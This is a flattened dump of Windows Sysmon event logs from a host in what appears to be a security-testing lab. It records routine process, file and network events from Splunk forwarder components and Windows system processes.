12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.917{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.918{266CAFBE-6537-6064-2201-00000000AE01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.730{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32BB9451C81D45831616D5DDBBAF276F,SHA256=B8701247396672D0791F3FB81C3F28263ADE766BA79DE2E0BAD25EB9EF364464,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.479{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53621-false10.0.1.12-8000- 10341000x80000000000000009027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.246{266CAFBE-6537-6064-2101-00000000AE01}67286368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.090{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:07.091{266CAFBE-6537-6064-2101-00000000AE01}6728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:08.744{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=137D4EE03D9D2C0477D5C5E11820DD5A,SHA256=DEC60D9E4C23CB751E88ABB26C4FFA52BB29959EE14F1ECA419810C049F08E6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:08.073{266CAFBE-6537-6064-2201-00000000AE01}70006904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=054B95208ADCC9A54CA886DFADAE2F19,SHA256=D306D3F1088138FFA161FDEC54B0B14BE7B33D8C27D1A3B4E5676912774DC3C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 